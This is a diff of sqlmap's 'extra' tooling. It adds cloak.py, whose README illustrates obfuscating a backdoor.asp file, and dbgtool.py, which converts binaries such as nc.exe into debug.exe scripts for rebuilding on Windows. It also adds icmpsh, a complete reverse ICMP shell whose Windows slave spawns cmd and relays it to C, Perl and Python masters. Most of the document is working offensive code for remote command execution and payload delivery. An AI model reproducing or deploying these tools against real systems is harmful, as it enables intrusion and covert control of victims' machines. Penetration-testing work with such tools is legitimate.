 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 import os
 import subprocess
 import sys
 import wave
 BEEP_WAV_FILENAME = os.path.join(os.path.dirname(__file__), "beep.wav")
 def beep():
    try:
        if subprocess.mswindows:
            _win_wav_play(BEEP_WAV_FILENAME)
        elif sys.platform == "darwin":
            _mac_beep()
        elif sys.platform == "linux2":
            _linux_wav_play(BEEP_WAV_FILENAME)
        else:
            _speaker_beep()
    except:
        _speaker_beep()
 def _speaker_beep():
    sys.stdout.write('\a')  # doesn't work on modern Linux systems
    try:
        sys.stdout.flush()
    except IOError:
        pass
 def _mac_beep():
    import Carbon.Snd
    Carbon.Snd.SysBeep(1)
 def _win_wav_play(filename):
    import winsound
    winsound.PlaySound(filename, winsound.SND_FILENAME)
 def _linux_wav_play(filename):
    for _ in ("aplay", "paplay", "play"):
        if not os.system("%s '%s' 2>/dev/null" % (_, filename)):
            return
    import ctypes
    PA_STREAM_PLAYBACK = 1
    PA_SAMPLE_S16LE = 3
    BUFFSIZE = 1024
    class struct_pa_sample_spec(ctypes.Structure):
        _fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)]
    pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0")
    wave_file = wave.open(filename, "rb")
    pa_sample_spec = struct_pa_sample_spec()
    pa_sample_spec.rate = wave_file.getframerate()
    pa_sample_spec.channels = wave_file.getnchannels()
    pa_sample_spec.format = PA_SAMPLE_S16LE
    error = ctypes.c_int(0)
    pa_stream = pa.pa_simple_new(None, filename, PA_STREAM_PLAYBACK, None, "playback", ctypes.byref(pa_sample_spec), None, None, ctypes.byref(error))
    if not pa_stream:
        raise Exception("Could not create pulse audio stream: %s" % pa.strerror(ctypes.byref(error)))
    while True:
        latency = pa.pa_simple_get_latency(pa_stream, ctypes.byref(error))
        if latency == -1:
            raise Exception("Getting latency failed")
        buf = wave_file.readframes(BUFFSIZE)
        if not buf:
            break
        if pa.pa_simple_write(pa_stream, buf, len(buf), ctypes.byref(error)):
            raise Exception("Could not play file")
    wave_file.close()
    if pa.pa_simple_drain(pa_stream, ctypes.byref(error)):
        raise Exception("Could not simple drain")
    pa.pa_simple_free(pa_stream)
 if __name__ == "__main__":
    beep()
--- a/extra/beep/beep.wav
+++ b/extra/beep/beep.wav
--- a/extra/cloak/README.txt
+++ b/extra/cloak/README.txt
@@ -0,0 +1,22 @@
 To use cloak.py you need to pass it the original file,
 and optionally the output file name.
 Example:
 $ python ./cloak.py -i backdoor.asp -o backdoor.asp_
 This will create an encrypted and compressed binary file backdoor.asp_.
 Such file can then be converted to its original form by using the -d
 functionality of the cloak.py program:
 $ python ./cloak.py -d -i backdoor.asp_ -o backdoor.asp
 If you skip the output file name, general rule is that the compressed
 file names are suffixed with the character '_', while the original is
 get by skipping the last character. So, that means that the upper
 examples can also be written in the following form:
 $ python ./cloak.py -i backdoor.asp
 $ python ./cloak.py -d -i backdoor.asp_
--- a/extra/cloak/init.py
+++ b/extra/cloak/init.py
@@ -0,0 +1,8 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 pass
--- a/extra/cloak/cloak.py
+++ b/extra/cloak/cloak.py
@@ -0,0 +1,85 @@
 #!/usr/bin/env python
 """
 cloak.py - Simple file encryption/compression utility
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 import os
 import sys
 import zlib
 from optparse import OptionError
 from optparse import OptionParser
 def hideAscii(data):
    retVal = ""
    for i in xrange(len(data)):
        if ord(data[i]) < 128:
            retVal += chr(ord(data[i]) ^ 127)
        else:
            retVal += data[i]
    return retVal
 def cloak(inputFile=None, data=None):
    if data is None:
        with open(inputFile, "rb") as f:
            data = f.read()
    return hideAscii(zlib.compress(data))
 def decloak(inputFile=None, data=None):
    if data is None:
        with open(inputFile, "rb") as f:
            data = f.read()
    try:
        data = zlib.decompress(hideAscii(data))
    except:
        print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile
        sys.exit(1)
    finally:
        f.close()
    return data
 def main():
    usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
    parser = OptionParser(usage=usage, version='0.1')
    try:
        parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')
        parser.add_option('-i', dest='inputFile', help='Input file')
        parser.add_option('-o', dest='outputFile', help='Output file')
        (args, _) = parser.parse_args()
        if not args.inputFile:
            parser.error('Missing the input file, -h for help')
    except (OptionError, TypeError), e:
        parser.error(e)
    if not os.path.isfile(args.inputFile):
        print 'ERROR: the provided input file \'%s\' is non existent' % args.inputFile
        sys.exit(1)
    if not args.decrypt:
        data = cloak(args.inputFile)
    else:
        data = decloak(args.inputFile)
    if not args.outputFile:
        if not args.decrypt:
            args.outputFile = args.inputFile + '_'
        else:
            args.outputFile = args.inputFile[:-1]
    f = open(args.outputFile, 'wb')
    f.write(data)
    f.close()
 if __name__ == '__main__':
    main()
--- a/extra/dbgtool/README.txt
+++ b/extra/dbgtool/README.txt
@@ -0,0 +1,20 @@
 To use dbgtool.py you need to pass it the MS-DOS executable binary file,
 and optionally the output debug.exe script file name.
 Example:
 $ python ./dbgtool.py -i ./nc.exe -o nc.scr
 This will create a ASCII text file with CRLF line terminators called
 nc.scr.
 Such file can then be converted to its original portable executable with
 the Windows native debug.exe, that is installed by default in all Windows
 systems:
 > debug.exe < nc.scr
 To be able to execute it on Windows you have to rename it to end with
 '.com' or '.exe':
 > ren nc_exe nc.exe
--- a/extra/dbgtool/init.py
+++ b/extra/dbgtool/init.py
@@ -0,0 +1,8 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 pass
--- a/extra/dbgtool/dbgtool.py
+++ b/extra/dbgtool/dbgtool.py
@@ -0,0 +1,95 @@
 #!/usr/bin/env python
 """
 dbgtool.py - Portable executable to ASCII debug script converter
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 import os
 import sys
 import struct
 from optparse import OptionError
 from optparse import OptionParser
 def convert(inputFile):
    fileStat = os.stat(inputFile)
    fileSize = fileStat.st_size
    if fileSize > 65280:
        print "ERROR: the provided input file '%s' is too big for debug.exe" % inputFile
        sys.exit(1)
    script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))
    script += "%x\nf 0100 ffff 00\n" % fileSize
    scrString = ""
    counter = 256
    counter2 = 0
    fp = open(inputFile, "rb")
    fileContent = fp.read()
    for fileChar in fileContent:
        unsignedFileChar = struct.unpack("B", fileChar)[0]
        if unsignedFileChar != 0:
            counter2 += 1
            if not scrString:
                scrString = "e %0x %02x" % (counter, unsignedFileChar)
            else:
                scrString += " %02x" % unsignedFileChar
        elif scrString:
            script += "%s\n" % scrString
            scrString = ""
            counter2 = 0
        counter += 1
        if counter2 == 20:
            script += "%s\n" % scrString
            scrString = ""
            counter2 = 0
    script += "w\nq\n"
    return script
 def main(inputFile, outputFile):
    if not os.path.isfile(inputFile):
        print "ERROR: the provided input file '%s' is not a regular file" % inputFile
        sys.exit(1)
    script = convert(inputFile)
    if outputFile:
        fpOut = open(outputFile, "w")
        sys.stdout = fpOut
        sys.stdout.write(script)
        sys.stdout.close()
    else:
        print script
 if __name__ == "__main__":
    usage = "%s -i <input file> [-o <output file>]" % sys.argv[0]
    parser = OptionParser(usage=usage, version="0.1")
    try:
        parser.add_option("-i", dest="inputFile", help="Input binary file")
        parser.add_option("-o", dest="outputFile", help="Output debug.exe text file")
        (args, _) = parser.parse_args()
        if not args.inputFile:
            parser.error("Missing the input file, -h for help")
    except (OptionError, TypeError), e:
        parser.error(e)
    inputFile = args.inputFile
    outputFile = args.outputFile
    main(inputFile, outputFile)
--- a/extra/icmpsh/README.txt
+++ b/extra/icmpsh/README.txt
@@ -0,0 +1,45 @@
 icmpsh - simple reverse ICMP shell
 icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl.
 --- Running the Master ---
 The master is straight forward to use. There are no extra libraries required for the C version. 
 The Perl master however has the following dependencies:
    * IO::Socket
    * NetPacket::IP
    * NetPacket::ICMP
 When running the master, don't forget to disable ICMP replies by the OS. For example:
    sysctl -w net.ipv4.icmp_echo_ignore_all=1
 If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive
 commands send from the master.
 --- Running the Slave ---
 The slave comes with a few command line options as outlined below:
 -t host            host ip address to send ping requests to. This option is mandatory!
 -r                 send a single test icmp request containing the string "Test1234" and then quit. 
                   This is for testing the connection.
 -d milliseconds    delay between requests in milliseconds 
 -o milliseconds    timeout of responses in milliseconds. If a response has not received in time, 
                   the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
                   The counter is set back to 0 if a response was received.
 -b num             limit of blanks (unanswered icmp requests before quitting
 -s bytes           maximal data buffer size in bytes
 In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer.
--- a/extra/icmpsh/init.py
+++ b/extra/icmpsh/init.py
@@ -0,0 +1,22 @@
 #!/usr/bin/env python
 #
 #  icmpsh - simple icmp command shell (port of icmpsh-m.pl written in
 #  Perl by Nico Leidecker <nico@leidecker.info>)
 #
 #  Copyright (c) 2010, Bernardo Damele A. G. <bernardo.damele@gmail.com>
 #
 #
 #  This program is free software: you can redistribute it and/or modify
 #  it under the terms of the GNU General Public License as published by
 #  the Free Software Foundation, either version 3 of the License, or
 #  (at your option) any later version.
 #
 #  This program is distributed in the hope that it will be useful,
 #  but WITHOUT ANY WARRANTY; without even the implied warranty of
 #  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 #  GNU General Public License for more details.
 #
 #  You should have received a copy of the GNU General Public License
 #  along with this program.  If not, see <http://www.gnu.org/licenses/>.
 pass
--- a/extra/icmpsh/icmpsh-m.c
+++ b/extra/icmpsh/icmpsh-m.c
@@ -0,0 +1,134 @@
 /*
 *   icmpsh - simple icmp command shell
 *   Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
 *   This program is free software: you can redistribute it and/or modify
 *   it under the terms of the GNU General Public License as published by
 *   the Free Software Foundation, either version 3 of the License, or
 *   (at your option) any later version.
 *
 *    This program is distributed in the hope that it will be useful,
 *    but WITHOUT ANY WARRANTY; without even the implied warranty of
 *    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *    GNU General Public License for more details.
 *
 *    You should have received a copy of the GNU General Public License
 *    along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */
 #include <stdio.h>
 #include <stdlib.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <sys/stat.h>
 #include <netinet/in.h>
 #include <netinet/ip_icmp.h>
 #include <netinet/ip.h>
 #include <string.h>
 #include <unistd.h>
 #include <fcntl.h>
 #define IN_BUF_SIZE   1024
 #define OUT_BUF_SIZE  64
 // calculate checksum
 unsigned short checksum(unsigned short *ptr, int nbytes)
 {
    unsigned long sum;
    unsigned short oddbyte, rs;
    sum = 0;
    while(nbytes > 1) {
        sum += *ptr++;
        nbytes -= 2;
    }
    if(nbytes == 1) {
        oddbyte = 0;
        *((unsigned char *) &oddbyte) = *(u_char *)ptr;
        sum += oddbyte;
    }
    sum  = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    rs = ~sum;
    return rs;
 }
 int main(int argc, char **argv)
 {
    int sockfd;
    int flags;
    char in_buf[IN_BUF_SIZE];
    char out_buf[OUT_BUF_SIZE];
    unsigned int out_size;
    int nbytes;
    struct iphdr *ip;
    struct icmphdr *icmp;
    char *data;
    struct sockaddr_in addr;
    printf("icmpsh - master\n");
    // create raw ICMP socket
    sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);
    if (sockfd == -1) {
       perror("socket");
       return -1;
    }
    // set stdin to non-blocking
    flags = fcntl(0, F_GETFL, 0);
    flags |= O_NONBLOCK;
    fcntl(0, F_SETFL, flags);
    printf("running...\n");
    while(1) {
        // read data from socket
        memset(in_buf, 0x00, IN_BUF_SIZE);
        nbytes = read(sockfd, in_buf, IN_BUF_SIZE - 1);
        if (nbytes > 0) {
            // get ip and icmp header and data part
            ip = (struct iphdr *) in_buf;
            if (nbytes > sizeof(struct iphdr)) {
                nbytes -= sizeof(struct iphdr);
                icmp = (struct icmphdr *) (ip + 1);
                if (nbytes > sizeof(struct icmphdr)) {
                    nbytes -= sizeof(struct icmphdr);
                    data = (char *) (icmp + 1);
                    data[nbytes] = '\0';
                    printf("%s", data);
                    fflush(stdout);
                }
                // reuse headers
                icmp->type = 0;
                addr.sin_family = AF_INET;
                addr.sin_addr.s_addr = ip->saddr;
                // read data from stdin
                nbytes = read(0, out_buf, OUT_BUF_SIZE);
                if (nbytes > -1) {
                    memcpy((char *) (icmp + 1), out_buf, nbytes);
                    out_size = nbytes;
                } else {
                    out_size = 0;
                }
                icmp->checksum = 0x00;
                icmp->checksum = checksum((unsigned short *) icmp, sizeof(struct icmphdr) + out_size);
                // send reply
                nbytes = sendto(sockfd, icmp, sizeof(struct icmphdr) + out_size, 0, (struct sockaddr *) &addr, sizeof(addr));
                if (nbytes == -1) {
                    perror("sendto");
                    return -1;
                }        
            }
        }
    }
    return 0;
 }
--- a/extra/icmpsh/icmpsh-m.pl
+++ b/extra/icmpsh/icmpsh-m.pl
@@ -0,0 +1,62 @@
 #!/usr/bin/env perl
 #
 #  icmpsh - simple icmp command shell
 #  Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
 #  This program is free software: you can redistribute it and/or modify
 #  it under the terms of the GNU General Public License as published by
 #  the Free Software Foundation, either version 3 of the License, or
 #  (at your option) any later version.
 #
 #  This program is distributed in the hope that it will be useful,
 #  but WITHOUT ANY WARRANTY; without even the implied warranty of
 #  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 #  GNU General Public License for more details.
 #
 #  You should have received a copy of the GNU General Public License
 #  along with this program.  If not, see <http://www.gnu.org/licenses/>.
 #
 use strict;
 use IO::Socket;
 use NetPacket::IP;
 use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
 use Net::RawIP;
 use Fcntl;
 print "icmpsh - master\n";
 # create raw socket
 my $sock = IO::Socket::INET->new(
                Proto   => "ICMP",
                Type    => SOCK_RAW,
                Blocking => 1) or die "$!";
 # set stdin to non-blocking
 fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
 print "running...\n";
 my $input = '';
 while(1) {
        if ($sock->recv(my $buffer, 4096, 0)) {
                my $ip = NetPacket::IP->decode($buffer);
                my $icmp = NetPacket::ICMP->decode($ip->{data});
                if ($icmp->{type} == ICMP_ECHO) {
                        # get identifier and sequencenumber
                        my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data});
                        # write data to stdout and read from stdin
                        print $data;
                        $input = <STDIN>;
                        # compile and send response
                        $icmp->{type} = ICMP_ECHOREPLY;
                        $icmp->{data} = pack("SSa*", $ident, $seq, $input);
                        my $raw = $icmp->encode();
                        my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));
                        $sock->send($raw, 0, $addr) or die "$!\n";
                }
        }
 }
--- a/extra/icmpsh/icmpsh-s.c
+++ b/extra/icmpsh/icmpsh-s.c
@@ -0,0 +1,344 @@
 /*
 *   icmpsh - simple icmp command shell
 *   Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
 *   This program is free software: you can redistribute it and/or modify
 *   it under the terms of the GNU General Public License as published by
 *   the Free Software Foundation, either version 3 of the License, or
 *   (at your option) any later version.
 *
 *    This program is distributed in the hope that it will be useful,
 *    but WITHOUT ANY WARRANTY; without even the implied warranty of
 *    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *    GNU General Public License for more details.
 *
 *    You should have received a copy of the GNU General Public License
 *    along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */
 #include <stdio.h>
 #include <stdlib.h>
 #include <winsock2.h>
 #include <windows.h>
 #include <winsock2.h>
 #include <iphlpapi.h>
 #define ICMP_HEADERS_SIZE	(sizeof(ICMP_ECHO_REPLY) + 8)
 #define STATUS_OK					0
 #define STATUS_SINGLE				1
 #define STATUS_PROCESS_NOT_CREATED	2
 #define TRANSFER_SUCCESS			1
 #define TRANSFER_FAILURE			0
 #define DEFAULT_TIMEOUT			    3000
 #define DEFAULT_DELAY			    200
 #define DEFAULT_MAX_BLANKS	   	    10
 #define DEFAULT_MAX_DATA_SIZE	    64
 FARPROC icmp_create, icmp_send, to_ip;
 int verbose = 0;
 int spawn_shell(PROCESS_INFORMATION *pi, HANDLE *out_read, HANDLE *in_write)
 {
 	SECURITY_ATTRIBUTES sattr;
 	STARTUPINFOA si;
 	HANDLE in_read, out_write;
 	memset(&si, 0x00, sizeof(SECURITY_ATTRIBUTES));
 	memset(pi, 0x00, sizeof(PROCESS_INFORMATION));
 	// create communication pipes  
 	memset(&sattr, 0x00, sizeof(SECURITY_ATTRIBUTES));
 	sattr.nLength = sizeof(SECURITY_ATTRIBUTES); 
 	sattr.bInheritHandle = TRUE; 
 	sattr.lpSecurityDescriptor = NULL; 
 	if (!CreatePipe(out_read, &out_write, &sattr, 0)) {
 		return STATUS_PROCESS_NOT_CREATED;
 	}
 	if (!SetHandleInformation(*out_read, HANDLE_FLAG_INHERIT, 0)) {
 		return STATUS_PROCESS_NOT_CREATED;
 	}
 	if (!CreatePipe(&in_read, in_write, &sattr, 0)) {
 		return STATUS_PROCESS_NOT_CREATED;
 	}
 	if (!SetHandleInformation(*in_write, HANDLE_FLAG_INHERIT, 0)) {
 		return STATUS_PROCESS_NOT_CREATED;
 	}
 	// spawn process
 	memset(&si, 0x00, sizeof(STARTUPINFO));
 	si.cb = sizeof(STARTUPINFO); 
 	si.hStdError = out_write;
 	si.hStdOutput = out_write;
 	si.hStdInput = in_read;
 	si.dwFlags |= STARTF_USESTDHANDLES;
 	if (!CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA) &si, pi)) {
 		return STATUS_PROCESS_NOT_CREATED;
 	}
 	CloseHandle(out_write);
 	CloseHandle(in_read);
 	return STATUS_OK;
 }
 void usage(char *path)
 {
 	printf("%s [options] -t target\n", path);
 	printf("options:\n");
 	printf("  -t host            host ip address to send ping requests to\n");
 	printf("  -r                 send a single test icmp request and then quit\n");
 	printf("  -d milliseconds    delay between requests in milliseconds (default is %u)\n", DEFAULT_DELAY);
 	printf("  -o milliseconds    timeout in milliseconds\n");
 	printf("  -h                 this screen\n");
 	printf("  -b num             maximal number of blanks (unanswered icmp requests)\n");
    printf("                     before quitting\n");
 	printf("  -s bytes           maximal data buffer size in bytes (default is %u bytes)\n\n", DEFAULT_MAX_DATA_SIZE);
 	printf("In order to improve the speed, lower the delay (-d) between requests or\n");
    printf("increase the size (-s) of the data buffer\n");
 }
 void create_icmp_channel(HANDLE *icmp_chan)
 {
 	// create icmp file
 	*icmp_chan = (HANDLE) icmp_create();
 }
 int transfer_icmp(HANDLE icmp_chan, unsigned int target, char *out_buf, unsigned int out_buf_size, char *in_buf, unsigned int *in_buf_size, unsigned int max_in_data_size, unsigned int timeout)
 {
 	int rs;
 	char *temp_in_buf;
 	int nbytes;
 	PICMP_ECHO_REPLY echo_reply;
 	temp_in_buf = (char *) malloc(max_in_data_size + ICMP_HEADERS_SIZE);
 	if (!temp_in_buf) {
 		return TRANSFER_FAILURE;
 	}
 	// send data to remote host
 	rs = icmp_send(
 			icmp_chan,
 			target,
 			out_buf,
 			out_buf_size,
 			NULL,
 			temp_in_buf,
 			max_in_data_size + ICMP_HEADERS_SIZE,
 			timeout);
 		// check received data
 		if (rs > 0) {
 			echo_reply = (PICMP_ECHO_REPLY) temp_in_buf;
 			if (echo_reply->DataSize > max_in_data_size) {
 				nbytes = max_in_data_size;
 			} else {
 				nbytes = echo_reply->DataSize;
 			}
 			memcpy(in_buf, echo_reply->Data, nbytes);
 			*in_buf_size = nbytes;
 			free(temp_in_buf);
 			return TRANSFER_SUCCESS;
 		}
 		free(temp_in_buf);
    return TRANSFER_FAILURE;
 }
 int load_deps()
 {
 	HMODULE lib;
 	lib = LoadLibraryA("ws2_32.dll");
 	if (lib != NULL) {
        to_ip = GetProcAddress(lib, "inet_addr");
        if (!to_ip) {   
            return 0;
        }
    }
 	lib = LoadLibraryA("iphlpapi.dll");
 	if (lib != NULL) {
 		icmp_create = GetProcAddress(lib, "IcmpCreateFile");
 		icmp_send = GetProcAddress(lib, "IcmpSendEcho");
 		if (icmp_create && icmp_send) {
 			return 1;
 		}
 	} 
 	lib = LoadLibraryA("ICMP.DLL");
 	if (lib != NULL) {
 		icmp_create = GetProcAddress(lib, "IcmpCreateFile");
 		icmp_send = GetProcAddress(lib, "IcmpSendEcho");
 		if (icmp_create && icmp_send) {
 			return 1;
 		}
 	}
 	printf("failed to load functions (%u)", GetLastError());
 	return 0;
 }
 int main(int argc, char **argv)
 {
 	int opt;
 	char *target;
 	unsigned int delay, timeout;
 	unsigned int ip_addr;
 	HANDLE pipe_read, pipe_write;
 	HANDLE icmp_chan;
 	unsigned char *in_buf, *out_buf;
 	unsigned int in_buf_size, out_buf_size;
 	DWORD rs;
 	int blanks, max_blanks;
 	PROCESS_INFORMATION pi;
 	int status;
 	unsigned int max_data_size;
 	// set defaults
 	target = 0;
 	timeout = DEFAULT_TIMEOUT;
 	delay = DEFAULT_DELAY;
 	max_blanks = DEFAULT_MAX_BLANKS;
 	max_data_size = DEFAULT_MAX_DATA_SIZE;
 	status = STATUS_OK;
 	if (!load_deps()) {
 		printf("failed to load ICMP library\n");
 		return -1;
 	}
 	// parse command line options
 	for (opt = 1; opt < argc; opt++) {
 		if (argv[opt][0] == '-') {
 			switch(argv[opt][1]) {
 				case 'h':
 				    usage(*argv);
 					return 0;
 				case 't':
 					if (opt + 1 < argc) {
 						target = argv[opt + 1];
 					}
 					break;
 				case 'd':
 					if (opt + 1 < argc) {
 						delay = atol(argv[opt + 1]);
 					}
 					break;
 				case 'o':
 					if (opt + 1 < argc) {
 						timeout = atol(argv[opt + 1]);
 					}
 					break;
 				case 'r':
 					status = STATUS_SINGLE;
 					break;
 				case 'b':
 					if (opt + 1 < argc) {
 						max_blanks = atol(argv[opt + 1]);
 					}
 					break;
 				case 's':
 					if (opt + 1 < argc) {
 						max_data_size = atol(argv[opt + 1]);
 					}
 					break;
 				default:
 					printf("unrecognized option -%c\n", argv[1][0]);
 					usage(*argv);
 					return -1;
 			}
 		}
 	}
 	if (!target) {
 		printf("you need to specify a host with -t. Try -h for more options\n");
 		return -1;
 	}
 	ip_addr = to_ip(target);
 	// don't spawn a shell if we're only sending a single test request
 	if (status != STATUS_SINGLE) {
 		status = spawn_shell(&pi, &pipe_read, &pipe_write);
 	}
 	// create icmp channel
 	create_icmp_channel(&icmp_chan);
 	if (icmp_chan == INVALID_HANDLE_VALUE) {
 	    printf("unable to create ICMP file: %u\n", GetLastError());
 	    return -1;
 	}
 	// allocate transfer buffers
 	in_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE);
 	out_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE);
 	if (!in_buf || !out_buf) {
 		printf("failed to allocate memory for transfer buffers\n");
 		return -1;
 	}
 	memset(in_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE);
 	memset(out_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE);
 	// sending/receiving loop
 	blanks = 0;
 	do {
 		switch(status) {
 			case STATUS_SINGLE:
 				// reply with a static string
 				out_buf_size = sprintf(out_buf, "Test1234\n");
 				break;
 			case STATUS_PROCESS_NOT_CREATED:
 				// reply with error message
 				out_buf_size = sprintf(out_buf, "Process was not created\n");
 				break;
 			default:
 				// read data from process via pipe
 				out_buf_size = 0;
 				if (PeekNamedPipe(pipe_read, NULL, 0, NULL, &out_buf_size, NULL)) {
 					if (out_buf_size > 0) {
 						out_buf_size = 0;
 						rs = ReadFile(pipe_read, out_buf, max_data_size, &out_buf_size, NULL);
 						if (!rs && GetLastError() != ERROR_IO_PENDING) {
 							out_buf_size = sprintf(out_buf, "Error: ReadFile failed with %i\n", GetLastError());
 						} 
 					}
 				} else {
 					out_buf_size = sprintf(out_buf, "Error: PeekNamedPipe failed with %i\n", GetLastError());
 				}
 				break;
 		}
 		// send request/receive response
 		if (transfer_icmp(icmp_chan, ip_addr, out_buf, out_buf_size, in_buf, &in_buf_size,  max_data_size, timeout) == TRANSFER_SUCCESS) {
 			if (status == STATUS_OK) {
 				// write data from response back into pipe
 				WriteFile(pipe_write, in_buf, in_buf_size, &rs, 0);
 			}
 			blanks = 0;
 		} else {
 			// no reply received or error occured
 			blanks++;
 		}
 		// wait between requests
 		Sleep(delay);
 	} while (status == STATUS_OK && blanks < max_blanks);
 	if (status == STATUS_OK) {
 		TerminateProcess(pi.hProcess, 0);
 	}
    return 0;
 }
--- a/extra/icmpsh/icmpsh.exe_
+++ b/extra/icmpsh/icmpsh.exe_
--- a/extra/icmpsh/icmpsh_m.py
+++ b/extra/icmpsh/icmpsh_m.py
@@ -0,0 +1,138 @@
 #!/usr/bin/env python
 #
 #  icmpsh - simple icmp command shell (port of icmpsh-m.pl written in
 #  Perl by Nico Leidecker <nico@leidecker.info>)
 #
 #  Copyright (c) 2010, Bernardo Damele A. G. <bernardo.damele@gmail.com>
 #
 #
 #  This program is free software: you can redistribute it and/or modify
 #  it under the terms of the GNU General Public License as published by
 #  the Free Software Foundation, either version 3 of the License, or
 #  (at your option) any later version.
 #
 #  This program is distributed in the hope that it will be useful,
 #  but WITHOUT ANY WARRANTY; without even the implied warranty of
 #  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 #  GNU General Public License for more details.
 #
 #  You should have received a copy of the GNU General Public License
 #  along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import os
 import select
 import socket
 import subprocess
 import sys
 def setNonBlocking(fd):
    """
    Make a file descriptor non-blocking
    """
    import fcntl
    flags = fcntl.fcntl(fd, fcntl.F_GETFL)
    flags = flags | os.O_NONBLOCK
    fcntl.fcntl(fd, fcntl.F_SETFL, flags)
 def main(src, dst):
    if subprocess.mswindows:
        sys.stderr.write('icmpsh master can only run on Posix systems\n')
        sys.exit(255)
    try:
        from impacket import ImpactDecoder
        from impacket import ImpactPacket
    except ImportError:
        sys.stderr.write('You need to install Python Impacket library first\n')
        sys.exit(255)
    # Make standard input a non-blocking file
    stdin_fd = sys.stdin.fileno()
    setNonBlocking(stdin_fd)
    # Open one socket for ICMP protocol
    # A special option is set on the socket so that IP headers are included
    # with the returned data
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    except socket.error:
        sys.stderr.write('You need to run icmpsh master with administrator privileges\n')
        sys.exit(1)
    sock.setblocking(0)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    # Create a new IP packet and set its source and destination addresses
    ip = ImpactPacket.IP()
    ip.set_ip_src(src)
    ip.set_ip_dst(dst)
    # Create a new ICMP packet of type ECHO REPLY
    icmp = ImpactPacket.ICMP()
    icmp.set_icmp_type(icmp.ICMP_ECHOREPLY)
    # Instantiate an IP packets decoder
    decoder = ImpactDecoder.IPDecoder()
    while True:
        cmd = ''
        # Wait for incoming replies
        if sock in select.select([ sock ], [], [])[0]:
            buff = sock.recv(4096)
            if 0 == len(buff):
                # Socket remotely closed
                sock.close()
                sys.exit(0)
            # Packet received; decode and display it
            ippacket = decoder.decode(buff)
            icmppacket = ippacket.child()
            # If the packet matches, report it to the user
            if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type():
                # Get identifier and sequence number
                ident = icmppacket.get_icmp_id()
                seq_id = icmppacket.get_icmp_seq()
                data = icmppacket.get_data_as_string()
                if len(data) > 0:
                    sys.stdout.write(data)
                # Parse command from standard input
                try:
                    cmd = sys.stdin.readline()
                except:
                    pass
                if cmd == 'exit\n':
                    return
                # Set sequence number and identifier
                icmp.set_icmp_id(ident)
                icmp.set_icmp_seq(seq_id)
                # Include the command as data inside the ICMP packet
                icmp.contains(ImpactPacket.Data(cmd))
                # Calculate its checksum
                icmp.set_icmp_cksum(0)
                icmp.auto_checksum = 1
                # Have the IP packet contain the ICMP packet (along with its payload)
                ip.contains(icmp)
                # Send it to the target host
                sock.sendto(ip.get_packet(), (dst, 0))
 if __name__ == '__main__':
    if len(sys.argv) < 3:
        msg = 'missing mandatory options. Execute as root:\n'
        msg += './icmpsh-m.py <source IP address> <destination IP address>\n'
        sys.stderr.write(msg)
        sys.exit(1)
    main(sys.argv[1], sys.argv[2])
--- a/extra/msfauxmod/README.txt
+++ b/extra/msfauxmod/README.txt
@@ -1,78 +0,0 @@
 To use Metasploit's sqlmap auxiliary module launch msfconsole and follow
 the example below.
 Note that if you are willing to run Metasploit's sqlmap auxiliary module on
 through WMAP framework you first need to install sqlmap on your system or
 add its file system path to the PATH environment variable.
 $ ./msfconsole
                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
 | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
 | | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
 |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|
       =[ msf v3.2-testing
 + -- --=[ 308 exploits - 173 payloads
 + -- --=[ 20 encoders - 6 nops
       =[ 75 aux
 msf > use auxiliary/scanner/http/wmap_sqlmap 
